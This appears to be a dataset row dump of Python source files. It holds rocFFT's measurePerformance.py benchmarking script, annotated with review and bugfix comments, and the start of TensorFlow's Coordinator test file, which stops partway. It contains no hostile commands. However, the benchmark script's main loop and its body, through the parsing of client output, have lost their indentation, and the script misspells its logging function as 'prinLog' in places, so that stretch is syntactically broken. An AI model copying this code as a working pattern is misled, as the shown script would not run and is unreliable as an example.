source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
#!/usr/bin/env python
# #############################################################################
# Copyright (c) 2013 - present Advanced Micro Devices, Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# #############################################################################
import sys
import argparse
import subprocess
import itertools
import re
import os
import math
from threading import Timer, Thread
import thread, time
from platform import system
import numpy as np
from datetime import datetime
import errorHandler
from fftPerformanceTesting import *
from performanceUtility import timeout, log, generate235Radices
#Todo list:
# - more error handling
# - more tests for relative path
# NOTE(review): "TIMOUT_VAL" is a typo for TIMEOUT_VAL; kept as-is because it
# is referenced by checkTimeOutPut below.
TIMOUT_VAL = 900 #In seconds
WARNING_LOG_MAX_ENTRY = 500  # stop printing reference-comparison warnings after this many failures
MIN_GFLOPS_TO_COMPARE = 10  # reference rows at or below this GFLOPS value are not compared
MAX_RERUN_NUM = 128  # upper bound on numbered --rerun output files (_r0.csv .. _r127.csv)
#layoutvalues = ['cp', 'ci']
placevalues = ['in', 'out']
precisionvalues = ['single', 'double']
# Shorthand expanded when '--batchsize pow10' is given: powers-of-ten ranges.
pow10 = '1-9,10-90:10,100-900:100,1000-9000:1000,10000-90000:10000,100000-900000:100000,1000000-9000000:1000000'
# Command-line interface.
# NOTE(review): two help strings below call .format(pow10) without a '{}'
# placeholder, so the formatting is a no-op.
parser = argparse.ArgumentParser(description='Measure performance of the rocFFT library')
parser.add_argument('--device',
    dest='device', default='0',
    help='device(s) to run on; may be a comma-delimited list. choices are (default gpu)')
parser.add_argument('-b', '--batchsize',
    dest='batchSize', default='1',
    help='number of FFTs to perform with one invocation of the client. the special value \'adapt\' may be used to adjust the batch size on a per-transform basis to the maximum problem size possible on the device. (default 1)'.format(pow10))
parser.add_argument('-a', '--adaptivemax',
    dest='constProbSize', default='-1',
    help='Max problem size that you want to maintain across the invocations of client with different lengths. This is adaptive and adjusts itself automtically.'.format(pow10))
parser.add_argument('-x', '--lengthx',
    dest='lengthx', default='1',
    help='length(s) of x to test; must be factors of 1, 2, 3, or 5 with rocFFT; may be a range or a comma-delimited list. e.g., 16-128 or 1200 or 16,2048-32768 (default 1)')
parser.add_argument('-y', '--lengthy',
    dest='lengthy', default='1',
    help='length(s) of y to test; must be factors of 1, 2, 3, or 5 with rocFFT; may be a range or a comma-delimited list. e.g., 16-128 or 1200 or 16,32768 (default 1)')
parser.add_argument('-z', '--lengthz',
    dest='lengthz', default='1',
    help='length(s) of z to test; must be factors of 1, 2, 3, or 5 with rocFFT; may be a range or a comma-delimited list. e.g., 16-128 or 1200 or 16,32768 (default 1)')
parser.add_argument('-reps',
    dest='reps', default='10',
    help='Number of repetitions (default 10)')
parser.add_argument('-prime_factor', '--prime_factor',
    dest='prime_factor', default='2',
    help='only test the prime factors within the specified range of lengthx/y/z. Select from 2,3,5, and 7. Example: -prime_factor 2,3')
parser.add_argument('-test_count', '--test_count',
    dest='test_count', default='100',
    help='Number of tests to perform')
parser.add_argument('--problemsize',
    dest='problemsize', default=None)
# help='additional problems of a set size. may be used in addition to lengthx/y/z. each indicated problem size will be added to the list of FFTs to perform. should be entered in AxBxC:D format. A, B, and C indicate the sizes of the X, Y, and Z dimensions (respectively). D is the batch size. All values except the length of X are optional. may enter multiple in a comma-delimited list. e.g., 2x2x2:32768 or 256x256:100,512x512:256')
parser.add_argument('-i', '--inputlayout',
    dest='inputlayout', default='0',
    help=' 0. interleaved (default) 1. planar 2. real 3. hermitian interleaved 4. hermitian planar' )
parser.add_argument('-o', '--outputlayout',
    dest='outputlayout', default='0',
    help=' 0. interleaved (default) 1. planar 2. real 3. hermitian interleaved 4. hermitian planar' )
parser.add_argument('--placeness',
    dest='placeness', default='in',
    help='Choices are ' + str(placevalues) + '. in = in place, out = out of place (default in)')
parser.add_argument('-r', '--precision',
    dest='precision', default='single',
    help='Choices are ' + str(precisionvalues) + '. (default single)')
parser.add_argument('--label',
    dest='label', default=None,
    help='a label to be associated with all transforms performed in this run. if LABEL includes any spaces, it must be in \"double quotes\". note that the label is not saved to an .ini file. e.g., --label cayman may indicate that a test was performed on a cayman card or --label \"Windows 32\" may indicate that the test was performed on Windows 32')
parser.add_argument('--ref-file',
    dest='refFilename', default=None,
    help='The reference results file to compare with.')
parser.add_argument('--ref-tol',
    dest='refTol', default='0.05',
    help='The reference gflops tolerance, default 5%%.')
parser.add_argument('--tablefile',
    dest='tableOutputFilename', default=None,
    help='save the results to a plaintext table with the file name indicated. this can be used with plotPerformance.py to generate graphs of the data (default: table prints to screen)')
parser.add_argument('--mute', action="store_true", help='no print')
parser.add_argument('--client-prefix',
    dest='client_prefix', default='./',
    help='Path where the library client is located (default current directory)')
parser.add_argument('--rerun',
    dest='rerun', default=None,
    help='rerun test from *.csv result file')
args = parser.parse_args()
label = str(args.label)
# todo: change the log dir, especially for rerun case
# Create the log directory and per-label log file used by printLog below.
if not os.path.exists('perfLog'):
    os.makedirs('perfLog')
logfile = os.path.join('perfLog', (label+'-'+'fftMeasurePerfLog.txt'))
def printLog(txt):
    """Echo txt to stdout (unless --mute) and always append it to the log file."""
    if not args.mute:
        print txt
    log(logfile, txt)
printLog("=========================MEASURE PERFORMANCE START===========================")
printLog("Process id of Measure Performance:"+str(os.getpid()))
currCommandProcess = None
# --rerun support: re-parse the command line recorded in a previous result
# file's '#Cmd:' header and write the new results to <name>_rN.csv.
rerun_args = ''
rerun_index = -1
rerun_file = str(args.rerun)
if args.rerun:
    if (not rerun_file) or (not os.path.isfile(rerun_file)):
        printLog('ERROR: invalid file/path for --rerun option.')
        quit()
    else:
        # Recover the original argv from the '#Cmd:' comment line.
        with open(rerun_file, 'r') as input:
            for line in input:
                if line.startswith('#Cmd:'):
                    rerun_args = line.strip().split('.py')[1] #todo: better err handling
                    rerun_args = rerun_args.strip().split(' ')
                    break
        if not "--tablefile" in rerun_args :
            printLog('ERROR: --rerun option, need explicitly specified --tablefile file.')
            quit()
        # Pick the first unused _rN suffix; NOTE(review): this rebinds the
        # module-level `args` from the recovered command line.
        for i in range(MAX_RERUN_NUM):
            next_file = rerun_file[:-4] + "_r" + str(i) + ".csv" #support csv file only for now
            if not os.path.isfile(next_file):
                rerun_args = [arg.replace(rerun_file, next_file) for arg in rerun_args]
                #print rerun_args
                args = parser.parse_args(rerun_args)
                args.label = os.path.basename(next_file)[:-4]
                rerun_index = i
                break
            if i >= MAX_RERUN_NUM-1:
                printLog('ERROR: --rerun option, too many files.')
                quit()
args.library = 'rocFFT'
if args.tableOutputFilename != None and args.refFilename != None:
    if args.tableOutputFilename == args.refFilename:
        printLog('ERROR: tablefile and ref-file are the same.')
        quit()
printLog('Executing measure performance for label: '+str(label))
#This function is defunct now
@timeout(1, "fileName") # timeout is 5 minutes, 5*60 = 300 secs
def checkTimeOutPut2(args):
    """Run the client command and return its stdout.

    Raises subprocess.CalledProcessError when stdout is empty, attaching
    stderr as the error output.  Defunct -- superseded by checkTimeOutPut.
    NOTE(review): the decorator passes 1, not 300 as its comment claims --
    confirm the intended unit of @timeout's first argument.
    """
    global currCommandProcess
    #ret = subprocess.check_output(args, stderr=subprocess.STDOUT)
    #return ret
    currCommandProcess = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    printLog("Curr Command Process id = "+str(currCommandProcess.pid))
    ret = currCommandProcess.communicate()
    if(ret[0] == None or ret[0] == ''):
        errCode = currCommandProcess.poll()
        raise subprocess.CalledProcessError(errCode, args, output=ret[1])
    return ret[0]
#Spawns a separate thread to execute the library command and wait for that thread to complete
#This wait is of 900 seconds (15 minutes). If still the thread is alive then we kill the thread
def checkTimeOutPut(args):
    """Run the client command string in a shell with a TIMOUT_VAL watchdog.

    Returns the command's stdout.  Raises errorHandler.ApplicationException
    on timeout, subprocess.CalledProcessError when stdout is empty.
    NOTE(review): results are passed via module-level globals stdo/stde
    because the worker runs on a separate thread; not reentrant.
    """
    t = None
    global currCommandProcess
    global stde
    global stdo
    stde = None
    stdo = None
    def executeCommand():
        # Worker thread body: blocks in communicate() until the child exits.
        global currCommandProcess
        global stdo
        global stde
        try:
            stdo, stde = currCommandProcess.communicate()
            printLog('stdout:\n'+str(stdo).replace('\n', '\n          '))
            printLog('stderr:\n'+str(stde).replace('\n', '\n          '))
        except:
            printLog("ERROR: UNKNOWN Exception - +checkWinTimeOutPut()::executeCommand()")
    currCommandProcess = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True)
    thread = Thread(target=executeCommand)
    thread.start()
    thread.join(TIMOUT_VAL) #wait for the thread to complete
    if thread.is_alive():
        # Watchdog fired: kill the child; the worker thread then unblocks.
        printLog('ERROR: Killing the process - terminating thread because it is taking too much of time to execute')
        currCommandProcess.kill()
        printLog('ERROR: Timed out exception')
        raise errorHandler.ApplicationException(__file__, errorHandler.TIME_OUT)
    if stdo == "" or stdo==None:
        errCode = currCommandProcess.poll()
        printLog('ERROR: @@@@@Raising Called processor exception')
        raise subprocess.CalledProcessError(errCode, args, output=stde)
    return stdo
#turn pow10 into its range list
if args.batchSize.count('pow10'):
    args.batchSize = pow10
#split up comma-delimited lists
args.batchSize = args.batchSize.split(',')
args.constProbSize = int(args.constProbSize.split(',')[0])
args.device = args.device.split(',')
args.lengthx = args.lengthx.split(',')
args.lengthy = args.lengthy.split(',')
args.lengthz = args.lengthz.split(',')
args.prime_factor = args.prime_factor.split(',')
if args.problemsize:
    args.problemsize = args.problemsize.split(',')
args.inputlayout = args.inputlayout.split(',')
args.outputlayout = args.outputlayout.split(',')
args.placeness = args.placeness.split(',')
args.precision = args.precision.split(',')
printLog('Executing for label: '+str(args.label))
#check parameters for sanity
# batchSize of 'max' must not be in a list (does not get on well with others)
#if args.batchSize.count('max') and len(args.batchSize) > 1:
if ( args.batchSize.count('max') or args.batchSize.count('adapt') )and len(args.batchSize) > 1:
    printLog('ERROR: --batchsize max must not be in a comma delimited list')
    quit()
# in case of an in-place transform, input and output layouts must be the same (otherwise: *boom*)
#for n in args.placeness:
#    if n == 'in' or n == 'inplace':
#        if len(args.inputlayout) > 1 or len(args.outputlayout) > 1 or args.inputlayout[0] != args.outputlayout[0]:
#            printLog('ERROR: if transformation is in-place, input and output layouts must match')
#            quit()
# check for valid values in precision
for n in args.precision:
    if n != 'single' and n != 'double':
        printLog('ERROR: invalid value for precision')
        quit()
def isPrime(n):
    """Return True when abs(n) has no divisor in [2, sqrt(n)].

    Note: by this definition 0 and 1 are reported as prime, which the
    factor helpers below rely on (1 is kept in the divisor lists).
    """
    n = abs(n)
    for candidate in range(2, int(math.sqrt(n)) + 1):
        if n % candidate == 0:
            return False
    return True
def findFactors(number):
    """Return the sorted 'prime' divisors of number, including 1."""
    return [d for d in range(1, number + 1)
            if isPrime(d) and number % d == 0]
#Type : Function
#Input: num, a number which we need to factorize
#Return Type: list
#Details: This function returns only the prime factors of an input number,
#         with multiplicity, via recursive trial division (largest-first
#         recursion, so 20 -> [5,2,2] and 32 -> [2,2,2,2,2]; 1 -> [1])
def factor(num):
    """Return the prime factors of num with multiplicity (1 -> [1]).

    BUGFIX: uses floor division `num // i` instead of `num / i` so the
    recursion keeps integer arguments under Python 3 as well (the two are
    identical for ints under Python 2, and i divides num exactly here).
    """
    if num == 1:
        return [1]
    i = 2
    limit = num**0.5
    while i <= limit:
        if num % i == 0:
            ret = factor(num // i)
            ret.append(i)
            return ret
        i += 1
    # No divisor up to sqrt(num): num is prime.
    return [num]
def validateFactors(flist):
    """Return True when flist has at most 4 entries, all drawn from {1,2,3,5}."""
    allowed = (1, 2, 3, 5)
    if len(flist) > len(allowed):
        return False
    return all(f in allowed for f in flist)
#Type : Function
#Input: num, a number which we need to validate for 1,2,3 or 5 factors
#Return Type: boolean
#Details: Validates an input number by its prime factors: True when every
#         prime factor is one of 1, 2, 3, 5; False otherwise.
#         e.g: input: 20, returns: True
#              input: 28, returns: False
def validate_number_for_1235(num):
    """Return True when num is 0 or factors entirely into 1, 2, 3, and 5."""
    if num == 0:
        return True
    # Subset test replaces the original union-then-compare trick.
    return set(factor(num)).issubset(set([1, 2, 3, 5]))
def getValidNumbersInRange(rlist):
    """Filter rlist down to values whose divisors all pass validateFactors."""
    return [value for value in rlist
            if validateFactors(findFactors(value))]
def get_next_num_with_1235_factors(start):
    """Return the smallest number greater than start with only 1/2/3/5 factors."""
    candidate = start + 1
    while not validateFactors(findFactors(candidate)):
        candidate += 1
    return candidate
def check_number_for_1235_factors(number):
    """Return True when number factors into only 1,2,3,5; log an error otherwise.

    NOTE(review): the error message contains an unfilled '{0}' placeholder --
    .format() is never called, so the literal braces are printed.  This
    helper appears unused (check_for_1235_factors is used instead).
    """
    #printLog('number:'+ number)
    factors = findFactors(number)
    #printLog('factors:'+ factors)
    if not validateFactors(factors):
        printLog("ERROR: --{0} must have only 1,2,3,5 as factors")
        return False
    return True
def check_for_1235_factors(values, option):
    """Abort the run unless every value factors into only 1, 2, 3, and 5.

    values: list of strings such as '16' or '16-128' (a dash is treated
            like a comma, so both range endpoints are validated).
    option: option name interpolated into the error message.
    """
    #print 'values: ', values
    for n in values:
        for m in n.replace('-',',').split(','):
            if not validate_number_for_1235(int(m)):
                print 'ERROR: --{0} must specify number with only 1,2,3,5 as factors'.format(option)
                quit()
            #print 'Valid number for :',option,':', m
# Validate the requested lengths, then make sure the client binary exists.
if args.library == 'rocFFT':
    check_for_1235_factors(args.lengthx, 'lengthx')
    check_for_1235_factors(args.lengthy, 'lengthy')
    check_for_1235_factors(args.lengthz, 'lengthz')
if not os.path.isfile(args.client_prefix+executable(args.library)):
    printLog("ERROR: Could not find client named {0}".format(executable(args.library)))
    quit()
def get235RadicesNumberInRange(minimum, maximum):
    """Return every 2/3/5-radix number from minimum to maximum, inclusive.

    Assumes minimum and maximum are themselves 2/3/5-radix values (both must
    appear in the generated list, otherwise .index raises ValueError).
    """
    if minimum == 0 and maximum == 0:
        return [0]
    radices = generate235Radices(maximum)
    lo = radices.index(minimum)
    hi = radices.index(maximum)
    return radices[lo:hi + 1]
#expand ranges
class Range:
    """Expand range expressions like '16-128:x2' into explicit value lists.

    Each entry of `ranges` is either the literal 'max'/'adapt' (passed
    through), or 'BEGIN[-END][:STEP]' where STEP is '+N' (additive, the
    default), 'xN' (multiplicative), or 'l' (advance to the next number
    whose factors are all 1/2/3/5).  The result is uniquified and sorted
    in self.expanded.
    """
    def __init__(self, ranges, defaultStep='+1'):
        self.expanded = []
        for thisRange in ranges:
            if thisRange != 'max' and thisRange != 'adapt' :
                # Split off the step suffix (':STEP'), if any.
                if thisRange.count(':'):
                    self._stepAmount = thisRange.split(':')[1]
                else:
                    self._stepAmount = defaultStep
                thisRange = thisRange.split(':')[0]
                # Decide which stepper method _step() dispatches to.
                if self._stepAmount.count('x'):
                    self._stepper = '_mult'
                    self._stepAmount = self._stepAmount.lstrip('+x')
                    self._stepAmount = int(self._stepAmount)
                elif self._stepAmount.count('l'):
                    self._stepper = '_next_num_with_1235_factor'
                    self._stepAmount = 0
                else:
                    self._stepper = '_add'
                    self._stepAmount = self._stepAmount.lstrip('+x')
                    self._stepAmount = int(self._stepAmount)
                # 'BEGIN-END' or a single value (END == BEGIN).
                if thisRange.count('-'):
                    self.begin = int(thisRange.split('-')[0])
                    self.end = int(thisRange.split('-')[1])
                else:
                    self.begin = int(thisRange.split('-')[0])
                    self.end = int(thisRange.split('-')[0])
                self.current = self.begin
            # _thisRangeExpanded = []
            if thisRange == 'max':
                self.expanded = self.expanded + ['max']
            elif thisRange == 'adapt':
                self.expanded = self.expanded + ['adapt']
            elif self.begin == 0 and self._stepper == '_mult':
                # A multiplicative step starting from 0 would never advance.
                self.expanded = self.expanded + [0]
            else:
                if self._stepper == '_next_num_with_1235_factor':
                    self.expanded = self.expanded + get235RadicesNumberInRange(self.current, self.end)
                else:
                    while self.current <= self.end:
                        self.expanded = self.expanded + [self.current]
                        self._step()
        # now we want to uniquify and sort the expanded range
        self.expanded = list(set(self.expanded))
        self.expanded.sort()
    # advance current value to next
    def _step(self):
        getattr(self, self._stepper)()
    def _mult(self):
        self.current = self.current * self._stepAmount
    def _add(self):
        self.current = self.current + self._stepAmount
    def _next_num_with_1235_factor(self):
        self.current = get_next_num_with_1235_factors(self.current)
# Expand every range expression into an explicit list of values; the lengths
# use the 'l' default step (next number with only 1/2/3/5 factors).
args.batchSize = Range(args.batchSize).expanded
args.lengthx = Range(args.lengthx, 'l').expanded
args.lengthy = Range(args.lengthy, 'l').expanded
args.lengthz = Range(args.lengthz, 'l').expanded
def create_prime_factors(args, input_list):
    """Return candidate lengths built from the selected prime factors.

    For every prime in args.prime_factor (subset of 2,3,5,7) the powers up
    to max(input_list) are generated; all cross products falling inside
    [min(input_list), max(input_list)] are collected, sorted, and truncated
    to args.test_count entries.
    """
    hi = max(input_list)
    lo = min(input_list)
    power_lists = []
    for base in (2, 3, 5, 7):
        entries = [1]
        if str(base) in args.prime_factor:
            top = int(math.floor(math.log(hi, base) + 1))
            entries += [base ** e for e in range(1, top)]
        power_lists.append(entries)
    candidates = []
    for a, b, c, d in itertools.product(*power_lists):
        value = int(a) * int(b) * int(c) * int(d)
        if lo <= value <= hi:
            candidates.append(value)
    candidates.sort()
    return candidates[:int(args.test_count)]
# Restrict the expanded lengths to the requested prime-factor families.
args.lengthx=create_prime_factors(args,args.lengthx)
args.lengthy=create_prime_factors(args,args.lengthy)
args.lengthz=create_prime_factors(args,args.lengthz)
#expand problemsizes ('XxYxZ:batch')
#print "args.problemsize--1-->", args.problemsize
if args.problemsize and args.problemsize[0] != 'None':
    i = 0
    while i < len(args.problemsize):
        # 'AxBxC:D' -> [['A','B','C'], 'D']
        args.problemsize[i] = args.problemsize[i].split(':')
        args.problemsize[i][0] = args.problemsize[i][0].split('x')
        i = i+1
#create the problem size combinations for each run of the client
# A: This part creats a product of all possible combinations. Too many cases in 2/3D
#problem_size_combinations = itertools.product(args.lengthx, args.lengthy, args.lengthz, args.batchSize)
#problem_size_combinations = list(itertools.islice(problem_size_combinations, None))
# Instead of a full cross product, pair the length lists element-wise,
# broadcasting y/z (and the first batch size) to the length of x.
if args.lengthy[0]==1:
    args.lengthy=[1]*len(args.lengthx)
if args.lengthz[0]==1:
    args.lengthz=[1]*len(args.lengthx)
dummy=[args.batchSize[0]]*len(args.lengthx)
problem_size_combinations=zip(args.lengthx,args.lengthy,args.lengthz,dummy)
#print "args.problemsize--2-->", args.problemsize
#add manually entered problem sizes to the list of FFTs to crank out
manual_test_combinations = []
if args.problemsize and args.problemsize[0] != 'None':
    for n in args.problemsize:
        # Missing y/z default to 1; missing batch defaults to 1.
        x = []
        y = []
        z = []
        batch = []
        x.append(int(n[0][0]))
        if len(n[0]) >= 2:
            y.append(int(n[0][1]))
        else:
            y.append(1)
        if len(n[0]) >= 3:
            z.append(int(n[0][2]))
        else:
            z.append(1)
        if len(n) > 1:
            batch.append(int(n[1]))
        else:
            batch.append(1)
        combos = itertools.product(x, y, z, batch)
        combos = list(itertools.islice(combos, None))
        for n in combos:
            manual_test_combinations.append(n)
# manually entered problem sizes should not be plotted (for now). they may still be output in a table if requested
problem_size_combinations = problem_size_combinations + manual_test_combinations
#create final list of all transformations (with problem sizes and transform properties)
test_combinations = itertools.product(problem_size_combinations, args.device, args.inputlayout, args.outputlayout, args.placeness, args.precision)
test_combinations = list(itertools.islice(test_combinations, None))
test_combinations = [TestCombination(params[0][0], params[0][1], params[0][2], params[0][3], params[1], params[2], params[3], params[4], params[5], args.label) for params in test_combinations]
#print("lenghtx= ",test_combinations[0].x)
#print("lenghty= ",test_combinations[0].y)
#print("lenghtz= ",test_combinations[0].z)
#print("placeness= ",test_combinations[0].placeness)
#turn each test combination into a command, run the command, and then stash the gflops
gflops_result = [] # this is where we'll store the results for the table
#open output file and write the header
if args.tableOutputFilename == None:
    # No --tablefile given: derive a unique name from the first sizes and a timestamp.
    args.tableOutputFilename = 'rocFFT_' + 'x_'+ str(args.lengthx[0]) + '_y_'+str(args.lengthy[0])+'_z_'+str(args.lengthz[0])+'_'+str(args.precision[0])+ '_'+datetime.now().isoformat().replace(':','.') + '.txt'
else:
    if os.path.isfile(args.tableOutputFilename):
        # Never clobber an existing table; append a timestamp instead.
        oldname = args.tableOutputFilename
        args.tableOutputFilename = args.tableOutputFilename + datetime.now().isoformat().replace(':','.')
        message = 'A file with the name ' + oldname + ' already exists. Changing filename to ' + args.tableOutputFilename
        printLog(message)
printLog('table header---->'+ str(tableHeader))
table = open(args.tableOutputFilename, 'w')
table.write('#Do not change any content of this file except adding comments!!!\n')
table.write('#\n')
table.write('#Timestamp: ' + str(datetime.now()) + '\n')
table.write('#\n')
# Record the exact command line so --rerun can replay this run later.
if rerun_args:
    table.write('#From --rerun\n')
    table.write('#Cmd: python ' + str(sys.argv[0]) + ' ' + str(' '.join(rerun_args)) + '\n')
else:
    table.write('#Cmd: python ' + str(' '.join(sys.argv)) + '\n')
table.write('#\n')
table.write(tableHeader + '\n')
table.flush()
if args.constProbSize == -1:
    # Default the adaptive problem size to the device's max batch for a 1x1x1 FFT.
    args.constProbSize = maxBatchSize(1, 1, 1, args.inputlayout[0], args.precision[0], '-' + args.device[0])
args.constProbSize = int(args.constProbSize)
printLog('Total combinations = '+str(len(test_combinations)))
vi = 0
for params in test_combinations:
if vi>=int(args.test_count):
break
vi = vi+1
printLog("-----------------------------------------------------")
printLog('preparing command: '+ str(vi))
device = params.device
lengthx = str(params.x)
lengthy = str(params.y)
lengthz = str(params.z)
inlayout=str(params.inlayout)
outlayout=str(params.outlayout)
client_prefix=str(args.client_prefix)
if params.batchsize == 'max':
batchSize = maxBatchSize(lengthx, lengthy, lengthz, params.inlayout, params.precision, '-' + device)
elif params.batchsize == 'adapt':
batchSize = str(args.constProbSize/(int(lengthx)*int(lengthy)*int(lengthz)))
else:
batchSize = str(params.batchsize)
if params.placeness == 'inplace' or params.placeness == 'in':
placeness = ''
elif params.placeness == 'outofplace' or params.placeness == 'out':
placeness = '-o'
else:
printLog('ERROR: invalid value for placeness when assembling client command')
if params.precision == 'single':
precision = ''
elif params.precision == 'double':
precision = '--double'
else:
printLog('ERROR: invalid value for precision when assembling client command')
transformType = '0'
if (inlayout == '2' and (outlayout == '3' or outlayout == '4')):
transformType = '2'
elif (outlayout == '2' and (inlayout == '3' or outlayout == '4')):
transformType = '3'
#set up arguments here
arguments = [client_prefix+ executable(args.library),
'--device ' + device,
'-x', lengthx,
'-y', lengthy,
'-z', lengthz,
'--batchSize', batchSize,
'-t', transformType,
'--inArrType', inlayout,
'--outArrType',outlayout,
placeness,
precision,
'-p', args.reps]
writeline = True
try:
arguments=' '.join(arguments)
printLog('Executing Command: '+str(arguments))
output = checkTimeOutPut(arguments)
output = output.split(os.linesep);
printLog('Execution Successfull\n')
except errorHandler.ApplicationException as ae:
writeline = False
printLog('ERROR: Command is taking too much of time '+ae.message+'\n'+'Command: \n'+str(arguments))
continue
except subprocess.CalledProcessError as clientCrash:
print 'Command execution failure--->'
writeline = False
printLog('ERROR: client crash. Please report the following error message (with rocFFT error code, if given, and the parameters used to invoke measurePerformance.py) \n'+clientCrash.output+'\n')
printLog('IN ORIGINAL WE CALL QUIT HERE - 1\n')
continue
for x in output:
if x.count('out of memory'):
writeline = False
printLog('ERROR: Omitting line from table - problem is too large')
printLog('ERROR: Omitting line from table - problem is too large')
if writeline:
try:
output = itertools.ifilter( lambda x: x.count('gflops'), output)
output = list(itertools.islice(output, None))
thisResult = re.search('\d+\.*\d*e*-*\d*$', output[-1])
thisResult = float(thisResult.group(0))
gflops_result.append(thisResult)
thisResult = ('{:11d}'.format(params.x), '{:11d}'.format(params.y), '{:11d}'.format(params.z),\
'{:>11s}'.format(batchSize), '{:>7s}'.format(params.device), \
'{:>6s}'.format(params.inlayout), '{:>7s}'.format(params.outlayout), \
'{:>6s}'.format(params.placeness), '{:>10s}'.format(params.precision), \
'{:>12s}'.format(params.label), '{:>11.3f}'.format(thisResult))
outputRow = ''
for x in thisResult:
outputRow = outputRow + str(x) + ','
#outputRow = outputRow.rstrip(',')
table.write(outputRow + '\n')
table.flush()
except:
printLog('ERROR: Exception occurs in GFLOP parsing')
else:
if(len(output) > 0):
if output[0].find('nan') or output[0].find('inf'):
printLog( 'WARNING: output from client was funky for this run. skipping table row')
else:
prinLog('ERROR: output from client makes no sense')
printLog(str(output[0]))
printLog('IN ORIGINAL WE CALL QUIT HERE - 2\n')
else:
prinLog('ERROR: output from client makes no sense')
#quit()
# Optional comparison of the measured GFLOPS against a reference results
# file; rows slower than the reference by more than --ref-tol are reported.
if args.refFilename != None:
    printLog("-----------------------------------------------------")
    printLog("Enabled reference comparison")
    # BUGFIX: use a context manager so the reference file is closed
    # (the handle previously leaked).
    with open(args.refFilename, 'r') as refResults:
        refResultsContents = refResults.read()
    refResultsContents = refResultsContents.rstrip().split('\n')
    raw_data = []
    for line in refResultsContents:
        # Skip comments and blank lines; strip inline comments and the
        # trailing comma the table writer leaves on every row.
        if not (line.startswith('#') or len(line.strip()) == 0):
            raw_data.append(line.split('#')[0].rstrip(', '))
    printLog("      index"+str(tableHeader).replace("     GFLOPS", "     GFLOPS ref vs tested relative_err"))
    failedCount = 0
    totalCount = len(gflops_result)
    for idx, row in enumerate(raw_data):
        ref_gflops = float(row[row.rfind(',')+1:]) # assume the last col is GFLOPS
        if (idx < totalCount and np.less(MIN_GFLOPS_TO_COMPARE, ref_gflops) ):
            if np.less(gflops_result[idx], ref_gflops):
                relative_error = abs(ref_gflops - gflops_result[idx])/gflops_result[idx]
                if np.greater(relative_error, float(args.refTol)):
                    printLog("Warning: " + '{:>6d}'.format(idx+1) + row +
                             "," + '{:>11.3f}'.format(gflops_result[idx]) +
                             "," + '{:12.2%}'.format(-relative_error))
                    failedCount+=1
                    if failedCount>= WARNING_LOG_MAX_ENTRY:
                        printLog("Too many failed cases...")
                        break
    # BUGFIX: the passing rate was computed with integer division, which
    # always yields 0% (or 100%) under Python 2; force float division and
    # guard against an empty result set (vacuously 100%).
    if totalCount > 0:
        passing_rate = float(totalCount - failedCount) / totalCount
    else:
        passing_rate = 1.0
    printLog("\nTotal number of samples " + str(totalCount) +
             ", passing rate " + '{:.2%}'.format(passing_rate) +
             ", with tolerance " + '{:.2%}'.format(float(args.refTol)))
# After a --rerun, plot the original results file together with every
# generated _rN.csv file via plotPerformance.py.
if rerun_args:
    printLog("-----------------------------------------------------")
    printLog("Rerun auto plotting...")
    plot_output_file = ''
    plot_cmd = "python plotPerformance.py -x x -y gflops -d " + rerun_file
    if rerun_index > -1:
        for i in range(rerun_index+1):
            next_file = rerun_file[:-4] + "_r" + str(i) + ".csv" #support csv file only for now
            if os.path.isfile(next_file):
                plot_cmd += " -d " + next_file
            if i == rerun_index:
                # The newest rerun file names the output image.
                plot_output_file = next_file.replace(".csv", ".png")
    plot_cmd += " --outputfile " + plot_output_file
    subprocess.check_call(plot_cmd, shell=True)
    printLog("Plotted to file " + plot_output_file + '.')
printLog("=========================MEASURE PERFORMANCE ENDS===========================\n")
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Coordinator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import threading
import time
from tensorflow.python.framework import errors_impl
from tensorflow.python.platform import test
from tensorflow.python.training import coordinator
def StopOnEvent(coord, wait_for_stop, set_when_stopped):
  """Wait for `wait_for_stop`, request coordinator stop, then signal done.

  Args:
    coord: a Coordinator to stop.
    wait_for_stop: Event to block on before stopping.
    set_when_stopped: Event set after request_stop() has been called.
  """
  wait_for_stop.wait()
  coord.request_stop()
  set_when_stopped.set()
def RaiseOnEvent(coord, wait_for_stop, set_when_stopped, ex, report_exception):
  """Wait for `wait_for_stop`, raise `ex`, and notify the coordinator.

  Args:
    coord: a Coordinator.
    wait_for_stop: Event to block on before raising.
    set_when_stopped: optional Event set once the coordinator was notified.
    ex: exception instance to raise.
    report_exception: if True, pass the exception object to request_stop();
      otherwise pass sys.exc_info().

  NOTE(review): only RuntimeError is caught here; other exception types
  appear to propagate out of the thread (the finally clause still runs) --
  confirm against the OutOfRangeError test below.
  """
  try:
    wait_for_stop.wait()
    raise ex
  except RuntimeError as e:
    if report_exception:
      coord.request_stop(e)
    else:
      coord.request_stop(sys.exc_info())
  finally:
    if set_when_stopped:
      set_when_stopped.set()
